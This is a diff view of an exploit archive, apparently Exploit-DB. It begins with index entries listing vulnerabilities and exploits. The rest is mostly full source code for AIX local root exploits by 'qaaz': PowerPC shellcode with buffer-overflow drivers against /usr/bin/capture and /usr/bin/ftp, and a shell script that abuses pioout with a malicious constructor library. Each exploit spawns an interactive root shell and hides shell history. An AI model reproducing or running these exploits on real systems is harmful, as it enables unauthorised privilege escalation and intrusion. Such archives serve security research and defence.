24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0

Can't render this file because it is too large.

6
platforms/aix/local/1044.c
View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/netpmon", args, envs ); execve( "/usr/bin/netpmon", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]

6
platforms/aix/local/1045.c
View file

@ -95,6 +95,6 @@ int main()
execve( "/usr/sbin/ipl_varyon", args, envs ); execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]

6
platforms/aix/local/1046.c
View file

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/paginit", args, envs ); execve( "/usr/bin/paginit", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]

6
platforms/aix/local/333.c
View file

@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L ./a.out $L
done done
/str0ke /str0ke
*/ */
// milw0rm.com [1997-05-27] // milw0rm.com [1997-05-27]

6
platforms/aix/local/335.c
View file

@ -156,6 +156,6 @@ do
echo $L echo $L
L=`expr $L + 42` L=`expr $L + 42`
./a.out $L ./a.out $L
done */ done */
// milw0rm.com [1997-05-26] // milw0rm.com [1997-05-26]

356
platforms/aix/local/4231.c
View file

@ -1,178 +1,178 @@
/* 07/2007: public release /* 07/2007: public release
* IBM AIX <= 5.3 sp6 * IBM AIX <= 5.3 sp6
* *
* AIX capture Local Root Exploit * AIX capture Local Root Exploit
* By qaaz * By qaaz
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <fcntl.h> #include <fcntl.h>
#include <unistd.h> #include <unistd.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/usr/bin/capture" #define TARGET "/usr/bin/capture"
#define VALCNT 40 #define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y)) #define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) #define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] = unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60" "\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f" "\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff" "\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; "\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2]) void shell(int p1[2], int p2[2])
{ {
ssize_t n; ssize_t n;
fd_set rset; fd_set rset;
char buf[4096]; char buf[4096];
for (;;) { for (;;) {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(p1[0], &rset); FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset); FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1, n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL); &rset, NULL, NULL, NULL);
if (n < 0) { if (n < 0) {
perror("[-] select"); perror("[-] select");
break; break;
} }
if (FD_ISSET(p1[0], &rset)) { if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf)); n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p1[1], buf, n); write(p1[1], buf, n);
} }
if (FD_ISSET(p2[0], &rset)) { if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf)); n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p2[1], buf, n); write(p2[1], buf, n);
} }
} }
} }
/* just because you don't understand it doesn't mean it has to be wrong */ /* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{ {
ulong top, len, off; ulong top, len, off;
int i; int i;
len = 0; len = 0;
for (i = 0; argv[i]; i++) for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1; len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++) for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1; len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8); top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0; len = off = 0;
for (i = 0; args[i]; i++) for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1; len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) { for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4)) if (!strncmp(envs[i], "EGG=", 4))
off = len + 4; off = len + 4;
len += strlen(envs[i]) + 1; len += strlen(envs[i]) + 1;
} }
while (off & 3) while (off & 3)
strcat(envs[0], "X"), off++, len++; strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off; return top - ALIGN(len, 4) + off;
} }
int main(int argc, char *argv[], char *envp[]) int main(int argc, char *argv[], char *envp[])
{ {
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL }; char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL }; char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2]; int ptm, pts, pi[2];
pid_t child; pid_t child;
ulong addr; ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs); addr = get_addr(argv, envp, args, envs);
if (!envp[0]) { if (!envp[0]) {
dup2(3, 0); dup2(3, 0);
setuid(geteuid()); setuid(geteuid());
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL); execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl"); perror("[-] execl");
exit(1); exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) { } else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch; char i, ch;
printf("\x1b["); printf("\x1b[");
for (i = 0; i < VALCNT; i++) for (i = 0; i < VALCNT; i++)
printf("%lu;", addr); printf("%lu;", addr);
printf("0A\n"); printf("0A\n");
fflush(stdout); fflush(stdout);
while (read(0, &ch, 1) == 1) while (read(0, &ch, 1) == 1)
write(1, &ch, 1); write(1, &ch, 1);
exit(0); exit(0);
} }
printf("--------------------------------\n"); printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n"); printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n"); printf(" By qaaz\n");
printf("--------------------------------\n"); printf("--------------------------------\n");
if (pipe(pi) < 0) { if (pipe(pi) < 0) {
perror("[-] pipe"); perror("[-] pipe");
exit(1); exit(1);
} }
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) { (pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty"); perror("[-] pty");
exit(1); exit(1);
} }
if ((child = fork()) < 0) { if ((child = fork()) < 0) {
perror("[-] fork"); perror("[-] fork");
exit(1); exit(1);
} }
if (child == 0) { if (child == 0) {
dup2(pts, 0); dup2(pts, 0);
dup2(pts, 1); dup2(pts, 1);
dup2(pts, 2); dup2(pts, 2);
dup2(pi[0], 3); dup2(pi[0], 3);
execve(TARGET, args, envs); execve(TARGET, args, envs);
perror("[-] execve"); perror("[-] execve");
exit(1); exit(1);
} }
close(pi[0]); close(pi[0]);
close(pts); close(pts);
sleep(1); sleep(1);
read(ptm, buf, sizeof(buf)); read(ptm, buf, sizeof(buf));
write(ptm, " ", 1); write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM); kill(child, SIGTERM);
waitpid(child, NULL, 0); waitpid(child, NULL, 0);
return 0; return 0;
} }
// milw0rm.com [2007-07-27] // milw0rm.com [2007-07-27]

58
platforms/aix/local/4232.sh
View file

@ -1,29 +1,29 @@
#!/bin/sh #!/bin/sh
# #
# 07/2007: public release # 07/2007: public release
# IBM AIX <= 5.3 sp6 # IBM AIX <= 5.3 sp6
# #
echo "-------------------------------" echo "-------------------------------"
echo " AIX pioout Local Root Exploit " echo " AIX pioout Local Root Exploit "
echo " By qaaz" echo " By qaaz"
echo "-------------------------------" echo "-------------------------------"
cat >piolib.c <<_EOF_ cat >piolib.c <<_EOF_
#include <stdlib.h> #include <stdlib.h>
#include <unistd.h> #include <unistd.h>
void init() __attribute__ ((constructor)); void init() __attribute__ ((constructor));
void init() void init()
{ {
seteuid(0); seteuid(0);
setuid(0); setuid(0);
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0); execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0); execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl"); perror("execl");
exit(1); exit(1);
} }
_EOF_ _EOF_
gcc piolib.c -o piolib -shared -fPIC gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib [ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib rm -f piolib.c piolib
# milw0rm.com [2007-07-27] # milw0rm.com [2007-07-27]

314
platforms/aix/local/4233.c
View file

@ -1,157 +1,157 @@
/* 07/2007: public release /* 07/2007: public release
* IBM AIX <= 5.3 sp6 * IBM AIX <= 5.3 sp6
* *
* AIX ftp Local Root Exploit * AIX ftp Local Root Exploit
* By qaaz * By qaaz
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <unistd.h> #include <unistd.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/usr/bin/ftp" #define TARGET "/usr/bin/ftp"
#define OVERLEN 300 #define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y)) #define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) #define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] = unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60" "\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f" "\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff" "\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; "\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2]) void shell(int p1[2], int p2[2])
{ {
ssize_t n; ssize_t n;
fd_set rset; fd_set rset;
char buf[4096]; char buf[4096];
for (;;) { for (;;) {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(p1[0], &rset); FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset); FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1, n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL); &rset, NULL, NULL, NULL);
if (n < 0) { if (n < 0) {
perror("[-] select"); perror("[-] select");
break; break;
} }
if (FD_ISSET(p1[0], &rset)) { if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf)); n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p1[1], buf, n); write(p1[1], buf, n);
} }
if (FD_ISSET(p2[0], &rset)) { if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf)); n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p2[1], buf, n); write(p2[1], buf, n);
} }
} }
} }
/* just because you don't understand it doesn't mean it has to be wrong */ /* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{ {
ulong top, len, off; ulong top, len, off;
int i; int i;
len = 0; len = 0;
for (i = 0; argv[i]; i++) for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1; len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++) for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1; len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8); top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0; len = off = 0;
for (i = 0; args[i]; i++) for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1; len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) { for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4)) if (!strncmp(envs[i], "EGG=", 4))
off = len + 4; off = len + 4;
len += strlen(envs[i]) + 1; len += strlen(envs[i]) + 1;
} }
while (off & 3) while (off & 3)
strcat(envs[0], "X"), off++, len++; strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off; return top - ALIGN(len, 4) + off;
} }
int main(int argc, char *argv[], char *envp[]) int main(int argc, char *argv[], char *envp[])
{ {
char pad[16] = "PAD=X", egg[512]; char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL }; char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL }; char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i; int pi[2], po[2], i;
pid_t child; pid_t child;
ulong addr; ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) { if (!envp[0]) {
setuid(geteuid()); setuid(geteuid());
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL); execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl"); perror("[-] execl");
exit(1); exit(1);
} }
printf("----------------------------\n"); printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n"); printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n"); printf(" By qaaz\n");
printf("----------------------------\n"); printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) { if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe"); perror("[-] pipe");
exit(1); exit(1);
} }
addr = get_addr(argv, envp, args, envs); addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) { if ((child = fork()) < 0) {
perror("[-] fork"); perror("[-] fork");
exit(1); exit(1);
} }
if (child == 0) { if (child == 0) {
dup2(pi[0], 0); dup2(pi[0], 0);
dup2(po[1], 1); dup2(po[1], 1);
dup2(po[1], 2); dup2(po[1], 2);
execve(TARGET, args, envs); execve(TARGET, args, envs);
perror("[-] execve"); perror("[-] execve");
exit(1); exit(1);
} }
write(pi[1], "macdef foo\n\n$\nfoo ab", 20); write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr)) for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr)); write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1); write(pi[1], "\n", 1);
fflush(stdout); fflush(stdout);
fflush(stderr); fflush(stderr);
close(pi[0]); close(pi[0]);
close(po[1]); close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM); kill(child, SIGTERM);
waitpid(child, NULL, 0); waitpid(child, NULL, 0);
return 0; return 0;
} }
// milw0rm.com [2007-07-27] // milw0rm.com [2007-07-27]

6
platforms/aix/local/898.sh
View file

@ -20,6 +20,6 @@ export PATH
/usr/sbin/invscout /usr/sbin/invscout
